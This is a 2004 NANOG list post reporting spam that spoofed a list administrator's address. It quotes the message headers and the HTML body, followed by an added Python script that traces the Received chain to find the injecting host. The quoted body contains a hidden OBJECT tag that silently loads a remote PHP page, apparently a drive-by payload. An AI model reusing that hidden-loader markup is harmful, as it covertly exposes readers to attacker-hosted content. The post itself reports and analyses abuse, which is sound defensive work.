now what - spam to nanog spoofing susan harris?

Suresh Ramasubramanian suresh at outblaze.com
Thu Mar 18 02:48:59 UTC 2004


Mailed out through an open proxy / hacked machine in some Australian 
museum, with a body that tries to load this HTML page - 
http://24.84.218.164:81/641280.php

Page is hosted on a shawcable connection (probably another trojaned box) 
that I can't seem to access, though the host is barely pingable.

	srs

> Return-Path: <owner-nanog at merit.edu>
> Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
> 	by corpmail.outblaze.com (Postfix) with ESMTP
> 	id B199316DD9F; Thu, 18 Mar 2004 02:43:17 +0000 (GMT)
> Received: by trapdoor.merit.edu (Postfix)
> 	id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
> Received: by trapdoor.merit.edu (Postfix, from userid 56)
> 	id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
> Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
> 	by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F
> 	for <nanog at trapdoor.merit.edu>; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
> Received: by segue.merit.edu (Postfix)
> 	id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
> Received: from PH02887.net (unknown [203.18.63.43])
> 	by segue.merit.edu (Postfix) with SMTP id 8220D5DE34
> 	for <nanog at merit.edu>; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
> Delivered-To: nanog-outgoing at trapdoor.merit.edu
> Delivered-To: nanog at trapdoor.merit.edu
> Delivered-To: nanog at merit.edu
> Date: Thu, 18 Mar 2004 13:40:35 +1000
> To: nanog at merit.edu
> Subject: Request response
> From: srh at merit.edu
> Message-ID: <xpvmqgksfnpfrcuagqc at merit.edu>
> MIME-Version: 1.0
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook Express 6.00.2600.0000
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
> Content-Type: text/html; charset=us-ascii
> Content-Transfer-Encoding: 7bit
> Sender: owner-nanog at merit.edu
> Precedence: bulk
> Errors-To: owner-nanog-outgoing at merit.edu
> X-Loop: nanog
> X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.11; VAE: 6.24.0.7; VDF: 6.24.0.61; host: corpmail.outblaze.com)
> 
> 
> <html><body>
> <font  face="System">
> <OBJECT STYLE="display:none"  DATA="http://24.84.218.164:81/641280.php">
> </OBJECT></body></html>
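
The Received chain quoted above can be walked mechanically to find the hop where the message entered the relays whose headers can be believed. This is an added example, not part of the original post: it assumes Postfix-style Received lines and that only merit.edu and outblaze.com relays are trusted, and the function names and flag labels are made up for illustration.

```python
import re
from email import message_from_string

# Headers copied from the quoted message above (archive " at " form kept).
RAW = """\
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
\tby corpmail.outblaze.com (Postfix) with ESMTP
\tid B199316DD9F; Thu, 18 Mar 2004 02:43:17 +0000 (GMT)
Received: by trapdoor.merit.edu (Postfix)
\tid 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
\tby trapdoor.merit.edu (Postfix) with ESMTP id 724909132F
\tfor <nanog at trapdoor.merit.edu>; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Received: from PH02887.net (unknown [203.18.63.43])
\tby segue.merit.edu (Postfix) with SMTP id 8220D5DE34
\tfor <nanog at merit.edu>; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
From: srh at merit.edu

"""
# Assumption: relays whose Received lines we believe (list host, our own MX).
TRUSTED = ("merit.edu", "outblaze.com")
# Postfix layout: from HELO (rDNS [IP]) by HOST; local hand-offs have only "by".
HOP = re.compile(r"(?:from\s+(\S+)\s+\((\S+)\s+\[([^\]]+)\]\)\s+)?by\s+(\S+)")

def in_domain(host, domains):
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)

def injection_hop(raw, trusted=TRUSTED):
    """Oldest SMTP hop recorded by a trusted relay, plus heuristic flags."""
    msg = message_from_string(raw)
    hop = None
    for value in msg.get_all("Received", []):   # newest hop first
        m = HOP.match(value.strip())
        if not m or not in_domain(m.group(4), trusted):
            break            # lines below this point could be forged
        if m.group(3):       # skip "by"-only local deliveries
            hop = dict(zip(("helo", "rdns", "ip", "by"), m.groups()))
    if hop is None:
        return None
    sender = re.split(r"@|\sat\s", msg.get("From", ""))[-1].strip(" <>").lower()
    hop["flags"] = flags = []
    if hop["rdns"] == "unknown":
        flags.append("no-rdns")
    elif hop["rdns"].lower() != hop["helo"].lower():
        flags.append("helo-mismatch")
    if in_domain(sender, trusted) and not in_domain(hop["rdns"], (sender,)):
        flags.append("spoofed-local-sender")
    return hop
```

Calling `injection_hop(RAW)` returns the hop written by segue.merit.edu, which is the only place in the chain where the peer address was recorded by a host the sender did not control.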




